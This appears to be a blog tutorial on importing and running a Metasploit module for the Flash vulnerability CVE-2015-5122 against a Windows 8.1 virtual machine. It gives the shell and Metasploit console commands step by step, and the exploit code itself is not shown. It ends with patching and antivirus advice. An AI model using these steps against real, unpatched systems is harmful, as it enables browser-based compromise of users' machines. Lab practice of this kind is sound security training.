Metasploit CVE-2015-5122 Flash Exploit
Metasploit CVE-2015-5122 Tutorial
First download the exploit code and make it available to Metasploit by creating an empty document and name it:Adobe_Flash_HackingTeam_exploit.rb
Than download the payload here:
And add it to the following directory:
Now copy the exploit code and paste it into the document.
Use the following command to copy the file from the desktop to the Metasploit modules folder (create the flash folder first if needed:
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/
Use the following command to check if the file has been actually copied to the destination folder:
ls /usr/share/metasploit-framework/modules/exploits/windows/flash/
Let’s open a new terminal and start Metasploit (and services if not already started) using the following command(s):
service postgresql start
service metasploit start
Now we’ve got Metasploit up and running with our newly imported exploit loaded, we use the following command to search for it:
search hackingteam
Now use the following command to use the newly added exploit:
use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit
Let’s check the options for Metasploit CVE-2015-5122 module with the following command:
show options
We will keep the default options and type “run” or “exploit” to start the exploit:
Let’s open the link from a Windows 8.1 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player ( installed.
How to avoid getting infected by CVE-2015-5122 and other exploits…
– Update Flash Player and keep it up-to-date.
– Install security patches and keep your OS up-to-date.
– Install a virus scanner and firewall and keep it updated.
– Keep your browser up-to-date.
– Do not install unneeded plug-ins.